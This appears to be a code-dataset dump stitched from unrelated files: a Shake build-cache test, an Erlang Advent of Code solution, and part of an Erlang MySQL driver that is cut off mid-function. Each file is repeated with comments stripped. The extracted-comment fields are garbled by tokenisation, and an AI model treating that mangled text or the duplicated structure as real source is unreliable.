assertContents "bug796" "ab"
writeFile "bug796.1" "A"
build ["bug796", "--sleep"]
assertContents "bug796" "Ab"
writeFile "bug796.2" "B"
build ["bug796", "--sleep"]
assertContents "bug796" "AB"
| null | https://raw.githubusercontent.com/ndmitchell/shake/1e8c1db2a55b70c1e2ba404c1eb476c7b6d9c8ac/src/Test/Cache.hs | haskell | Bug fixed in |
module Test.Cache(main) where
import Development.Shake
import Development.Shake.FilePath
import System.Directory
import Data.Char
import Test.Type
main = testBuild test $ do
vowels <- newCache $ \file -> do
src <- readFile' file
liftIO $ appendFile "trace.txt" "1"
pure $ length $ filter isDigit src
"*.out*" %> \x ->
writeFile' x . show =<< vowels (dropExtension x <.> "txt")
startCompiler <- newCache $ \() -> do
liftIO $ writeFile "compiler.txt" "on"
runAfter $ writeFile "compiler.txt" "off"
"*.lang" %> \out -> do
startCompiler ()
liftIO $ copyFile "compiler.txt" out
bug796_2 <- newCache $ \() -> do
readFile' "bug796.2"
"bug796" %> \out -> do
a <- readFile' "bug796.1"
b <- bug796_2 ()
writeFile' out $ a ++ b
test build = do
build ["clean"]
writeFile "trace.txt" ""
writeFile "vowels.txt" "abc123a"
build ["vowels.out1","vowels.out2","-j3","--sleep"]
assertContents "trace.txt" "1"
assertContents "vowels.out1" "3"
assertContents "vowels.out2" "3"
build ["vowels.out2","-j3"]
assertContents "trace.txt" "1"
assertContents "vowels.out1" "3"
writeFile "vowels.txt" "12xyz34"
build ["vowels.out2","-j3","--sleep"]
assertContents "trace.txt" "11"
assertContents "vowels.out2" "4"
build ["vowels.out1","-j3","--sleep"]
assertContents "trace.txt" "111"
assertContents "vowels.out1" "4"
build ["foo.lang","bar.lang"]
assertContents "foo.lang" "on"
assertContents "compiler.txt" "off"
writeFile "compiler.txt" "unstarted"
build ["foo.lang","bar.lang"]
assertContents "compiler.txt" "unstarted"
writeFile "bug796.1" "a"
writeFile "bug796.2" "b"
build ["bug796", "--sleep"]
assertContents "bug796" "ab"
writeFile "bug796.1" "A"
build ["bug796", "--sleep"]
assertContents "bug796" "Ab"
writeFile "bug796.2" "B"
build ["bug796", "--sleep"]
assertContents "bug796" "AB"
|
8c5f9e7fc13a4fce67b710314040947037991c7a9b831a8aa2757b409dd19a19 | jesperes/aoc_erlang | aoc2017_day14.erl | -module(aoc2017_day14).
-behavior(aoc_puzzle).
-include_lib("eunit/include/eunit.hrl").
-export([parse/1, solve1/1, solve2/1, info/0]).
-include("aoc_puzzle.hrl").
-spec info() -> aoc_puzzle().
info() ->
#aoc_puzzle{module = ?MODULE,
year = 2017,
day = 14,
name = "Disk Defragmentation",
expected = {8230, 1103},
has_input_file = false}.
-type input_type() :: [string()].
-type result_type() :: integer().
-spec parse(Binary :: binary()) -> input_type().
parse(_Binary) ->
Input = "hfdlxzhv",
lists:map(
fun(N) ->
Str = lists:flatten(io_lib:format("~s-~w", [Input, N])),
str_to_knot_hash_bits(Str)
end, lists:seq(0, 127)).
-spec solve1(Input :: input_type()) -> result_type().
solve1(Bits) ->
Ones = lists:filter(
fun(C) -> C =:= $1 end,
lists:flatten(Bits)),
length(Ones).
str_to_knot_hash_bits(Str) ->
KnotHash = aoc2017_day10:knot_hash(Str),
Bits = integer_to_list(list_to_integer(KnotHash, 16), 2),
string:right(Bits, 128, $0).
-spec solve2(Input :: input_type()) -> result_type().
solve2(Lines) ->
Set = bits_to_coord_set(Lines),
count_regions(Set).
bits_to_coord_set(Lines) ->
{_, Set} =
lists:foldl(
fun(Line, {Y, Coords}) ->
CoordsOut = fold_line(Line, Y, Coords),
{Y + 1, CoordsOut}
end, {0, gb_sets:new()}, Lines),
Set.
fold_line(Line, Y, Coords) ->
{_, CoordsOut} =
lists:foldl(
fun($1, {X, Acc}) ->
{X + 1, gb_sets:add_element({X, Y}, Acc)};
(_, {X, Acc}) ->
{X + 1, Acc}
end, {0, Coords}, Line),
CoordsOut.
count_regions(Set) ->
count_regions(Set, 1).
count_regions(Set, Num) ->
{First, Set0} = gb_sets:take_smallest(Set),
Set1 = fill_at(First, Num, Set0),
case gb_sets:is_empty(Set1) of
true -> Num;
false -> count_regions(Set1, Num + 1)
end.
fill_at({X, Y}, Num, Set) ->
Neighbors =
[ Nbr || Nbr <- [ {X - 1, Y},
{X, Y - 1},
{X + 1, Y},
{X, Y + 1}
],
gb_sets:is_element(Nbr, Set)
],
lists:foldl(
fun(Nbr, Acc) ->
fill_at(Nbr, Num, gb_sets:del_element(Nbr, Acc))
end, Set, Neighbors).
| null | https://raw.githubusercontent.com/jesperes/aoc_erlang/14c654288993c54f5385956bc6c8cecce3c1d6c3/src/2017/aoc2017_day14.erl | erlang | -module(aoc2017_day14).
-behavior(aoc_puzzle).
-include_lib("eunit/include/eunit.hrl").
-export([parse/1, solve1/1, solve2/1, info/0]).
-include("aoc_puzzle.hrl").
-spec info() -> aoc_puzzle().
info() ->
#aoc_puzzle{module = ?MODULE,
year = 2017,
day = 14,
name = "Disk Defragmentation",
expected = {8230, 1103},
has_input_file = false}.
-type input_type() :: [string()].
-type result_type() :: integer().
-spec parse(Binary :: binary()) -> input_type().
parse(_Binary) ->
Input = "hfdlxzhv",
lists:map(
fun(N) ->
Str = lists:flatten(io_lib:format("~s-~w", [Input, N])),
str_to_knot_hash_bits(Str)
end, lists:seq(0, 127)).
-spec solve1(Input :: input_type()) -> result_type().
solve1(Bits) ->
Ones = lists:filter(
fun(C) -> C =:= $1 end,
lists:flatten(Bits)),
length(Ones).
str_to_knot_hash_bits(Str) ->
KnotHash = aoc2017_day10:knot_hash(Str),
Bits = integer_to_list(list_to_integer(KnotHash, 16), 2),
string:right(Bits, 128, $0).
-spec solve2(Input :: input_type()) -> result_type().
solve2(Lines) ->
Set = bits_to_coord_set(Lines),
count_regions(Set).
bits_to_coord_set(Lines) ->
{_, Set} =
lists:foldl(
fun(Line, {Y, Coords}) ->
CoordsOut = fold_line(Line, Y, Coords),
{Y + 1, CoordsOut}
end, {0, gb_sets:new()}, Lines),
Set.
fold_line(Line, Y, Coords) ->
{_, CoordsOut} =
lists:foldl(
fun($1, {X, Acc}) ->
{X + 1, gb_sets:add_element({X, Y}, Acc)};
(_, {X, Acc}) ->
{X + 1, Acc}
end, {0, Coords}, Line),
CoordsOut.
count_regions(Set) ->
count_regions(Set, 1).
count_regions(Set, Num) ->
{First, Set0} = gb_sets:take_smallest(Set),
Set1 = fill_at(First, Num, Set0),
case gb_sets:is_empty(Set1) of
true -> Num;
false -> count_regions(Set1, Num + 1)
end.
fill_at({X, Y}, Num, Set) ->
Neighbors =
[ Nbr || Nbr <- [ {X - 1, Y},
{X, Y - 1},
{X + 1, Y},
{X, Y + 1}
],
gb_sets:is_element(Nbr, Set)
],
lists:foldl(
fun(Nbr, Acc) ->
fill_at(Nbr, Num, gb_sets:del_element(Nbr, Acc))
end, Set, Neighbors).
| |
2574b3ac67aca7a143949ba995dbc7df42b056fa4122d78cec461d3dec932554 | joearms/elib1 | elib1_mysql.erl | Copyright ( c ) 2006 - 2009
See MIT - LICENSE for licensing information .
-module(elib1_mysql).
%% File: mysql2.erl
%% Description: MySQL driver
Started : 4 Aug 2005
Time - stamp : < 2009 - 09 - 22 21:04:13 joe >
Notes
Origonal author :
Origonal Copyright : ( c ) 2001 - 2004 Kungliga Tekniska Högskolan
Modifications : < >
< >
%%
%% Testing:
run mysql2 : ) , ... etc .
Notes :
%% 1)
%% You have to provide your own password module
%% like this
%% -module(password).
-export([username/1 , password/1 ] ) .
%% username(mysql) -> "<User>".
%% password(mysql) -> "<Password>".
%%
%% 2) You must me able to access mysql with the above username
%% and password.
%% Try the command:
%% $ mysql -u <User> -p
%% Enter password: <Password>
%% If this is ok then your passwords etc are correctly setup
%%
%% -compile(export_all).
-export([start/2, start/3, start/4, cmd/2,
insert/2,
quote/1,
stop/1, test/1, debug/2]).
-import(lists, [reverse/1, seq/2, zipwith/3]).
-define(LONG_PASSWORD, 1).
-define(FOUND_ROWS, 2).
-define(LONG_FLAG, 4).
-define(PROTOCOL_41, 512).
-define(TRANSACTIONS, 8192).
-define(CONNECT_WITH_DB, 8).
-define(MAX_PACKET_SIZE, 1000000).
-define(SECURE_CONNECTION, 32768).
-define(MYSQL_QUERY_OP, 3).
test(1) ->
{ok, Pid} = start("localhost", 3306,
password:username(mysql), password:password(mysql)),
cmd(Pid, "show databases"),
cmd(Pid, "use test"),
cmd(Pid, "show tables"),
debug(Pid, true),
cmd(Pid, "select * from country limit 0,5"),
stop(Pid);
test(2) ->
{ok, Pid} = start("localhost", 3306,
password:username(mysql), password:password(mysql)),
cmd(Pid, "use test"),
cmd(Pid, "drop table if exists hash"),
cmd(Pid, "create table if not exists hash ("
"k CHAR(32) not null primary key," %% don't call this key
"val longblob not null)"),
cmd(Pid, "show tables"),
cmd(Pid, "insert into hash values ('abc','123')"),
cmd(Pid, insert("hash", [test,seq(0,255)])),
V1 = cmd(Pid, "select * from hash"),
cmd(Pid, "select val from hash where k='test'"),
cmd(Pid, "update hash set val='123' where k='test'"),
V2 = cmd(Pid, "select * from hash"),
stop(Pid),
{V1,V2}.
insert(Table, Vals) when is_list(Table) ->
["insert into ", Table, " values ", value_list(Vals)].
value_list(L) ->
[$(, value_list1(L), $)].
value_list1([H]) -> quote(H);
value_list1([H|T]) -> [quote(H),$,|value_list1(T)].
debug(Pid, Flag) ->
Pid ! {debug, Flag}.
cmd(Pid, Q) ->
rpc(Pid, {do_query, Q}).
rpc(Pid, Q) ->
Pid ! {self(), Q},
receive
{Pid, Reply} ->
Reply
end.
stop(Pid) ->
Pid ! stop.
%%----------------------------------------------------------------------
%% main entry point
start(User, Pass) -> start("localhost", 3306, User, Pass).
start(Host, User, Pass) -> start(Host, 3306, User, Pass).
start(Host, Port, User, Pass) ->
S = self(),
Pid = spawn_link(fun() -> init(Host, Port, User, Pass, S) end),
receive
{Pid, Ret} ->
Ret
end.
init(Host, Port, User, Pass, Parent) ->
S = self(),
Pid = spawn_link(fun() -> socket_driver(Host, Port, S) end),
receive
{Pid, ok} ->
case do_auth(Pid, User, Pass) of
{ok, Vsn} ->
Parent ! {self(), {ok, self()}},
top_loop(Vsn, Pid, false);
{error,_} = E ->
Parent ! {self(), E}
end;
{Pid, Error} ->
Parent ! {self(), Error}
end.
top_loop(Vsn, Driver, Debug) ->
receive
{debug, Flag} ->
top_loop(Vsn, Driver, Flag);
stop ->
Driver ! stop;
{From, {do_query, Q}} ->
Response = do_query(Driver, Vsn, Debug, Q),
From ! {self(), Response},
top_loop(Vsn, Driver, Debug);
Any ->
io:format("top_loop unexpected message:~p~n",[Any]),
top_loop(Vsn, Driver, Debug)
end.
%%----------------------------------------------------------------------
socket_driver(Host , Port , Parent )
%% try to open a socket to <Host,Port>
%% send Parent ! {self(), ok} if this succeeds
%% {self(), {error, Why}} if this fails
socket_driver(Host, Port, Parent) ->
case gen_tcp:connect(Host, Port, [binary, {packet, 0}]) of
{ok, Sock} ->
Parent ! {self(), ok},
driver_loop(Sock, Parent, <<>>);
{error, _} = E ->
Parent ! {self(), E}
end.
driver_loop(Sock, Pid, Bin0) ->
receive
stop ->
gen_tcp:close(Sock);
{tcp, Sock, Bin1} ->
Bin2 = list_to_binary([Bin0, Bin1]),
%% send data to parent if we have enough data
Bin3 = sendpacket(Pid, Bin2),
driver_loop(Sock, Pid, Bin3);
{tcp_error, Sock, Reason} ->
io:format("Socket error:~p ~p~n", [Sock, Reason]),
exit(oopps);
{tcp_closed, Sock} ->
Pid ! {self(), closed};
{send, Packet, Seq} ->
%% io:format("tosql:~p~n",[Packet]),
Bin = <<(size(Packet)):24/little, Seq:8, Packet/binary>>,
gen_tcp:send(Sock, Bin),
driver_loop(Sock, Pid, Bin0);
Other ->
io:format("uugh:~p~n",[Other]),
driver_loop(Sock, Pid, Bin0)
end.
sendpacket(Pid, Bin) ->
case Bin of
<<Length:24/little, Num:8, D/binary>> ->
if
Length =< size(D) ->
{Packet, Rest} = split_binary(D, Length),
io : format("from mysql:~p ~ n",[{mysql , Packet , } ] ) ,
Pid ! {self(), {mysql, Packet, Num}},
sendpacket(Pid, Rest);
true ->
Bin
end;
_ ->
Bin
end.
%%----------------------------------------------------------------------
%% do_query(...)
do_query(Pid, Vsn, Debug, Query) ->
Packet = list_to_binary([?MYSQL_QUERY_OP, Query]),
Pid ! {send, Packet, 0},
Response = get_query_response(Pid, Vsn),
case Response of
{error, Str} ->
io:format("Bad query:~s~nRespnse:~s~n",[Query,Str]);
_ ->
debug(Debug, "Query=~p~nResponse=~p~n",[Query, Response])
end,
Response.
debug(false, _, _) -> void;
debug(true, Format, Data) -> io:format(Format, Data).
get_query_response(Pid, Vsn) ->
<<Fieldcount:8, Rest/binary>> = do_recv(Pid),
%% io:format("Fieldcount:~p~n",[Fieldcount]),
case Fieldcount of
0 ->
%% No Tabular data
<<AffectedRows:8, _Rest2/binary>> = Rest,
{updated, AffectedRows};
255 ->
<<_Code:16/little, Message/binary>> = Rest,
{error, binary_to_list(Message)};
_ ->
Tabular data received
Fields = get_fields(Pid, [], Vsn),
%% io:format("Fields=~p~n",[Fields]),
Rows = get_rows(Fieldcount, Pid, []),
{data, Fields, Rows}
end.
get_fields(Pid, Res, my_sql_40) ->
Packet = do_recv(Pid),
case Packet of
<<254:8>> ->
reverse(Res);
<<254:8, Rest/binary>> when size(Rest) < 8 ->
reverse(Res);
_ ->
{Table, Rest} = get_with_length(Packet),
{Field, Rest2} = get_with_length(Rest),
{LengthB, Rest3} = get_with_length(Rest2),
LengthL = size(LengthB) * 8,
<<Length:LengthL/little>> = LengthB,
{Type, Rest4} = get_with_length(Rest3),
{_Flags, _Rest5} = get_with_length(Rest4),
Val = {binary_to_list(Table),
binary_to_list(Field),
Length,
TODO : Check on MySQL 4.0 if types are specified
using the same 4.1 formalism and could
%% be expanded to atoms:
binary_to_list(Type)},
get_fields(Pid, [Val|Res], my_sql_40)
end;
get_fields(Pid, Res, my_sql_41) ->
Support for MySQL 4.1.x and 5.x :
Packet = do_recv(Pid),
case Packet of
<<254:8>> ->
reverse(Res);
<<254:8, Rest/binary>> when size(Rest) < 8 ->
reverse(Res);
_ ->
{_Catalog, Rest} = get_with_length(Packet),
{Database, Rest2} = get_with_length(Rest),
{Table, Rest3} = get_with_length(Rest2),
OrgTable is the real table name if Table is an alias
{_OrgTable, Rest4} = get_with_length(Rest3),
{Field, Rest5} = get_with_length(Rest4),
OrgField is the real field name if Field is an alias
{_OrgField, Rest6} = get_with_length(Rest5),
<<_Metadata:8/little, _Charset:16/little,
Length:32/little, Type:8/little,
_Flags:16/little, _Decimals:8/little,
_Rest7/binary>> = Rest6,
This = {binary_to_list(Database),
binary_to_list(Table),
binary_to_list(Field),
Length,
get_field_datatype(Type)},
get_fields(Pid, [This | Res], my_sql_41)
end.
get_rows repeatedly receives rows until end - of - rows ( 254 )
is received . Each row has Nfields entries
get_rows(NFields, Pid, L) ->
Packet = do_recv(Pid),
case Packet of
<<254:8, Rest/binary>> when size(Rest) < 8 ->
%% the last packet
reverse(L);
_ ->
Row = get_row(NFields, Packet),
get_rows(NFields, Pid, [Row|L])
end.
%% get_row(N, Data, L) ->
%% unpacks exactly N values from Data
get_row(0, _) ->
[];
get_row(N, Data) ->
{Val, Data1} = get_with_length(Data),
[Val|get_row(N-1, Data1)].
get_with_length(<<251:8, B/binary>>) -> {null, B};
get_with_length(<<252:8, Len:16/little, B/binary>>) -> split_binary(B, Len);
get_with_length(<<253:8, Len:24/little, B/binary>>) -> split_binary(B, Len);
get_with_length(<<254:8, Len:64/little, B/binary>>) -> split_binary(B, Len);
get_with_length(<<Len:8, B/binary>>) when Len < 251 -> split_binary(B, Len).
%%----------------------------------------------------------------------
do_auth(Pid , , password ) - > { ok , Version } | { error , Why }
do_auth(Pid, User, Password) ->
receive
{Pid, {mysql, Packet, Seq}} ->
{Version, Salt1, Salt2, Caps} = greeting(Packet),
AuthRes =
case is_secure_connection(Caps) of
true ->
do_new_auth(Pid,Seq+1,User,Password,Salt1,Salt2);
false ->
do_old_auth(Pid,Seq+1,User,Password,Salt1)
end,
%% io:format("AuthRes=~p~n",[AuthRes]),
case AuthRes of
{ok, <<0:8, _Rest/binary>>, _RecvNum} ->
{ok, Version};
{ok, <<255:8, Code:16/little, Message/binary>>, _RecvNum} ->
io:format("mysql_conn: init error ~p: ~p~n",
[Code, binary_to_list(Message)]),
{error, binary_to_list(Message)};
{ok, RecvPacket, _RecvNum} ->
io:format("mysql_conn: init unknown error ~p~n",
[binary_to_list(RecvPacket)]),
{error, binary_to_list(RecvPacket)};
{error, Reason} ->
io:format("mysql_conn: init failed receiving data : ~p~n",
[Reason]),
{error, Reason}
end;
{error, Reason} ->
{error, Reason}
end.
do_old_auth(Pid, Seq, User, Password, Salt1) ->
%% io:format("do old auth~n"),
Auth = password_old(Password, Salt1),
Packet2 = make_auth(User, Auth),
send_mysql(Pid, Packet2, Seq),
do_recv(Pid, Seq).
do_new_auth(Pid, Seq, User, Password, Salt1, Salt2) ->
%% io:format("do new auth~n"),
Auth = password_new(Password, Salt1 ++ Salt2),
Packet2 = make_new_auth(User, Auth, none),
send_mysql(Pid, Packet2, Seq),
receive
{Pid, {mysql, Packet3, Seq1}} ->
case Packet3 of
<<254:8>> ->
AuthOld = password_old(Password, Salt1),
send_mysql(Pid, <<AuthOld/binary, 0:8>>, Seq1 + 1),
do_recv(Pid, Seq);
_ ->
{ok, Packet3, Seq1}
end;
Other ->
{error, {oops, Pid, Other}}
end.
password_new(Pwd, Salt) ->
Hash1 = elib1_sha1:binstring(Pwd),
Hash2 = elib1_sha1:binstring(binary_to_list(Hash1)),
Res = elib1_sha1:binstring(Salt ++ binary_to_list(Hash2)),
bxor_binary(Res, Hash1).
password_old(Password, Salt) ->
{P1, P2} = hash(Password),
{S1, S2} = hash(Salt),
Seed1 = P1 bxor S1,
Seed2 = P2 bxor S2,
List = rnd(9, Seed1, Seed2),
{L, [Extra]} = lists:split(8, List),
list_to_binary(lists:map(fun (E) ->
E bxor (Extra - 64)
end, L)).
%% part of do_old_auth/4, which is part of mysql_init/4
make_auth(User, Password) ->
Caps = ?LONG_PASSWORD bor ?LONG_FLAG
bor ?TRANSACTIONS bor ?FOUND_ROWS,
Maxsize = 0,
UserB = list_to_binary(User),
PasswordB = Password,
<<Caps:16/little, Maxsize:24/little, UserB/binary, 0:8,
PasswordB/binary>>.
make_new_auth(User, Password, Database) ->
DBCaps = case Database of
none ->
0;
_ ->
?CONNECT_WITH_DB
end,
Caps = ?LONG_PASSWORD bor ?LONG_FLAG bor ?TRANSACTIONS bor
?PROTOCOL_41 bor ?SECURE_CONNECTION bor DBCaps
bor ?FOUND_ROWS,
Maxsize = ?MAX_PACKET_SIZE,
UserB = list_to_binary(User),
PasswordL = size(Password),
DatabaseB = case Database of
none ->
<<>>;
_ ->
list_to_binary(Database)
end,
<<Caps:32/little, Maxsize:32/little, 8:8, 0:23/integer-unit:8,
UserB/binary, 0:8, PasswordL:8, Password/binary, DatabaseB/binary>>.
hash(S) ->
hash(S, 1345345333, 305419889, 7).
hash([C | S], N1, N2, Add) ->
N1_1 = N1 bxor (((N1 band 63) + Add) * C + N1 * 256),
N2_1 = N2 + ((N2 * 256) bxor N1_1),
Add_1 = Add + C,
hash(S, N1_1, N2_1, Add_1);
hash([], N1, N2, _Add) ->
Mask = (1 bsl 31) - 1,
{N1 band Mask , N2 band Mask}.
%%----------------------------------------------------------------------
%% parse the initial greeting from mysql
greeting(Packet) ->
<<_Protocol:8, Rest/binary>> = Packet,
{Version, Rest2} = asciz(Rest),
<<_TreadID:32/little, Rest3/binary>> = Rest2,
{Salt, Rest4} = asciz(Rest3),
<<Caps:16/little, Rest5/binary>> = Rest4,
<<_ServerChar:16/binary-unit:8, Rest6/binary>> = Rest5,
{Salt2, _Rest7} = asciz(Rest6),
%%% io:format("greeting version ~p (protocol ~p) salt ~p caps ~p "
%%% "serverchar ~p salt2 ~p~n",
[ Version , Protocol , Salt , Caps , ServerChar , Salt2 ] ) ,
{normalize_version(Version), Salt, Salt2, Caps}.
normalize_version([$4,$.,$0|_T]) ->
io:format("Switching to MySQL 4.0.x protocol.~n"),
my_sql_40;
normalize_version([$4,$.,$1|_T]) ->
my_sql_41;
normalize_version([$5|_T]) ->
MySQL version 5.x protocol is compliant with MySQL 4.1.x :
my_sql_41;
normalize_version(Other) ->
io:format("MySQL version not supported: ~p "
"MySQL Erlang module might not work correctly.~n", [Other]),
%% Error, but trying the oldest protocol anyway:
my_sql_40.
%%----------------------------------------------------------------------
%% odds and ends
asciz(Data) when is_list(Data) -> asciz_list(Data, []);
asciz(Data) when is_binary(Data) -> asciz_binary(Data, []).
asciz_list([], L) -> {reverse(L), []};
asciz_list([0|T], L) -> {reverse(L), T};
asciz_list([H|T], L) -> asciz_list(T, [H|L]).
asciz_binary(<<>>, Acc) -> {reverse(Acc), <<>>};
asciz_binary(<<0:8, Rest/binary>>, Acc) -> {reverse(Acc), Rest};
asciz_binary(<<C:8, Rest/binary>>, Acc) -> asciz_binary(Rest, [C|Acc]).
rnd(N, Seed1, Seed2) ->
Mod = (1 bsl 30) - 1,
rnd(N, [], Seed1 rem Mod, Seed2 rem Mod).
rnd(0, List, _, _) ->
reverse(List);
rnd(N, List, Seed1, Seed2) ->
Mod = (1 bsl 30) - 1,
NSeed1 = (Seed1 * 3 + Seed2) rem Mod,
NSeed2 = (NSeed1 + Seed2 + 33) rem Mod,
Float = (float(NSeed1) / float(Mod))*31,
Val = trunc(Float)+64,
rnd(N-1, [Val|List], NSeed1, NSeed2).
bxor_binary(B1, B2) ->
list_to_binary(zipwith(fun (E1, E2) -> E1 bxor E2 end,
binary_to_list(B1), binary_to_list(B2))).
send_mysql(Pid, Packet, Seq) when is_binary(Packet),
is_integer(Seq) ->
Pid ! {send, Packet, Seq}.
%%--------------------------------------------------------------------
get_field_datatype(0) -> 'DECIMAL';
get_field_datatype(1) -> 'TINY';
get_field_datatype(2) -> 'SHORT';
get_field_datatype(3) -> 'LONG';
get_field_datatype(4) -> 'FLOAT';
get_field_datatype(5) -> 'DOUBLE';
get_field_datatype(6) -> 'NULL';
get_field_datatype(7) -> 'TIMESTAMP';
get_field_datatype(8) -> 'LONGLONG';
get_field_datatype(9) -> 'INT24';
get_field_datatype(10) -> 'DATE';
get_field_datatype(11) -> 'TIME';
get_field_datatype(12) -> 'DATETIME';
get_field_datatype(13) -> 'YEAR';
get_field_datatype(14) -> 'NEWDATE';
get_field_datatype(16) -> 'BIT';
get_field_datatype(246) -> 'DECIMAL';
get_field_datatype(247) -> 'ENUM';
get_field_datatype(248) -> 'SET';
get_field_datatype(249) -> 'TINYBLOB';
get_field_datatype(250) -> 'MEDIUM_BLOG';
get_field_datatype(251) -> 'LONG_BLOG';
get_field_datatype(252) -> 'BLOB';
get_field_datatype(253) -> 'VAR_STRING';
get_field_datatype(254) -> 'STRING';
get_field_datatype(255) -> 'GEOMETRY'.
is_secure_connection(Caps) ->
case Caps band ?SECURE_CONNECTION of
?SECURE_CONNECTION -> true;
_ -> false
end.
do_recv(Pid) ->
receive
{Pid, {mysql, Packet, _Seq}} ->
Packet
end.
do_recv(Pid, Seq) ->
receive
{Pid, {mysql, Packet, Seq}} ->
{Packet, Seq};
{Pid, Other} ->
io:format("unexpected data:~p ~n",[Other]),
exit(1)
end.
%% Quote a string|binary|atom so that it can be included safely in a
%% mysql query
quote(X) when is_list(X) -> [$"|reverse([$"|quote(X, [])])];
quote(X) when is_binary(X) -> quote(binary_to_list(X));
quote(X) when is_atom(X) -> quote(atom_to_list(X)).
quote([], L) -> L;
quote([0|T], L) -> quote(T, [$0, $\\|L]);
quote([10|T], L) -> quote(T, [$n, $\\|L]);
quote([13|T], L) -> quote(T, [$r, $\\|L]);
quote([$\\|T], L) -> quote(T, [$\\, $\\|L]);
quote([$'|T], L) -> quote(T, [$', $\\|L]);
quote([$"|T], L) -> quote(T, [$", $\\|L]);
quote([26|T], L) -> quote(T, [$Z, $\\|L]);
quote([H|T], L) -> quote(T, [H|L]).
| null | https://raw.githubusercontent.com/joearms/elib1/d617d0ec70a058ef102749eadf51c024444c28d9/src/elib1_mysql.erl | erlang | File: mysql2.erl
Description: MySQL driver
Testing:
1)
You have to provide your own password module
like this
-module(password).
username(mysql) -> "<User>".
password(mysql) -> "<Password>".
2) You must me able to access mysql with the above username
and password.
Try the command:
$ mysql -u <User> -p
Enter password: <Password>
If this is ok then your passwords etc are correctly setup
-compile(export_all).
don't call this key
----------------------------------------------------------------------
main entry point
----------------------------------------------------------------------
try to open a socket to <Host,Port>
send Parent ! {self(), ok} if this succeeds
{self(), {error, Why}} if this fails
send data to parent if we have enough data
io:format("tosql:~p~n",[Packet]),
----------------------------------------------------------------------
do_query(...)
io:format("Fieldcount:~p~n",[Fieldcount]),
No Tabular data
io:format("Fields=~p~n",[Fields]),
be expanded to atoms:
the last packet
get_row(N, Data, L) ->
unpacks exactly N values from Data
----------------------------------------------------------------------
io:format("AuthRes=~p~n",[AuthRes]),
io:format("do old auth~n"),
io:format("do new auth~n"),
part of do_old_auth/4, which is part of mysql_init/4
----------------------------------------------------------------------
parse the initial greeting from mysql
io:format("greeting version ~p (protocol ~p) salt ~p caps ~p "
"serverchar ~p salt2 ~p~n",
Error, but trying the oldest protocol anyway:
----------------------------------------------------------------------
odds and ends
--------------------------------------------------------------------
Quote a string|binary|atom so that it can be included safely in a
mysql query | Copyright ( c ) 2006 - 2009
See MIT - LICENSE for licensing information .
-module(elib1_mysql).
Started : 4 Aug 2005
Time - stamp : < 2009 - 09 - 22 21:04:13 joe >
Notes
Origonal author :
Origonal Copyright : ( c ) 2001 - 2004 Kungliga Tekniska Högskolan
Modifications : < >
< >
run mysql2 : ) , ... etc .
Notes :
-export([username/1 , password/1 ] ) .
-export([start/2, start/3, start/4, cmd/2,
insert/2,
quote/1,
stop/1, test/1, debug/2]).
-import(lists, [reverse/1, seq/2, zipwith/3]).
-define(LONG_PASSWORD, 1).
-define(FOUND_ROWS, 2).
-define(LONG_FLAG, 4).
-define(PROTOCOL_41, 512).
-define(TRANSACTIONS, 8192).
-define(CONNECT_WITH_DB, 8).
-define(MAX_PACKET_SIZE, 1000000).
-define(SECURE_CONNECTION, 32768).
-define(MYSQL_QUERY_OP, 3).
test(1) ->
{ok, Pid} = start("localhost", 3306,
password:username(mysql), password:password(mysql)),
cmd(Pid, "show databases"),
cmd(Pid, "use test"),
cmd(Pid, "show tables"),
debug(Pid, true),
cmd(Pid, "select * from country limit 0,5"),
stop(Pid);
test(2) ->
{ok, Pid} = start("localhost", 3306,
password:username(mysql), password:password(mysql)),
cmd(Pid, "use test"),
cmd(Pid, "drop table if exists hash"),
cmd(Pid, "create table if not exists hash ("
"val longblob not null)"),
cmd(Pid, "show tables"),
cmd(Pid, "insert into hash values ('abc','123')"),
cmd(Pid, insert("hash", [test,seq(0,255)])),
V1 = cmd(Pid, "select * from hash"),
cmd(Pid, "select val from hash where k='test'"),
cmd(Pid, "update hash set val='123' where k='test'"),
V2 = cmd(Pid, "select * from hash"),
stop(Pid),
{V1,V2}.
insert(Table, Vals) when is_list(Table) ->
["insert into ", Table, " values ", value_list(Vals)].
value_list(L) ->
[$(, value_list1(L), $)].
value_list1([H]) -> quote(H);
value_list1([H|T]) -> [quote(H),$,|value_list1(T)].
debug(Pid, Flag) ->
Pid ! {debug, Flag}.
cmd(Pid, Q) ->
rpc(Pid, {do_query, Q}).
rpc(Pid, Q) ->
Pid ! {self(), Q},
receive
{Pid, Reply} ->
Reply
end.
stop(Pid) ->
Pid ! stop.
start(User, Pass) -> start("localhost", 3306, User, Pass).
start(Host, User, Pass) -> start(Host, 3306, User, Pass).
start(Host, Port, User, Pass) ->
S = self(),
Pid = spawn_link(fun() -> init(Host, Port, User, Pass, S) end),
receive
{Pid, Ret} ->
Ret
end.
init(Host, Port, User, Pass, Parent) ->
S = self(),
Pid = spawn_link(fun() -> socket_driver(Host, Port, S) end),
receive
{Pid, ok} ->
case do_auth(Pid, User, Pass) of
{ok, Vsn} ->
Parent ! {self(), {ok, self()}},
top_loop(Vsn, Pid, false);
{error,_} = E ->
Parent ! {self(), E}
end;
{Pid, Error} ->
Parent ! {self(), Error}
end.
top_loop(Vsn, Driver, Debug) ->
receive
{debug, Flag} ->
top_loop(Vsn, Driver, Flag);
stop ->
Driver ! stop;
{From, {do_query, Q}} ->
Response = do_query(Driver, Vsn, Debug, Q),
From ! {self(), Response},
top_loop(Vsn, Driver, Debug);
Any ->
io:format("top_loop unexpected message:~p~n",[Any]),
top_loop(Vsn, Driver, Debug)
end.
socket_driver(Host , Port , Parent )
socket_driver(Host, Port, Parent) ->
case gen_tcp:connect(Host, Port, [binary, {packet, 0}]) of
{ok, Sock} ->
Parent ! {self(), ok},
driver_loop(Sock, Parent, <<>>);
{error, _} = E ->
Parent ! {self(), E}
end.
driver_loop(Sock, Pid, Bin0) ->
receive
stop ->
gen_tcp:close(Sock);
{tcp, Sock, Bin1} ->
Bin2 = list_to_binary([Bin0, Bin1]),
Bin3 = sendpacket(Pid, Bin2),
driver_loop(Sock, Pid, Bin3);
{tcp_error, Sock, Reason} ->
io:format("Socket error:~p ~p~n", [Sock, Reason]),
exit(oopps);
{tcp_closed, Sock} ->
Pid ! {self(), closed};
{send, Packet, Seq} ->
Bin = <<(size(Packet)):24/little, Seq:8, Packet/binary>>,
gen_tcp:send(Sock, Bin),
driver_loop(Sock, Pid, Bin0);
Other ->
io:format("uugh:~p~n",[Other]),
driver_loop(Sock, Pid, Bin0)
end.
sendpacket(Pid, Bin) ->
case Bin of
<<Length:24/little, Num:8, D/binary>> ->
if
Length =< size(D) ->
{Packet, Rest} = split_binary(D, Length),
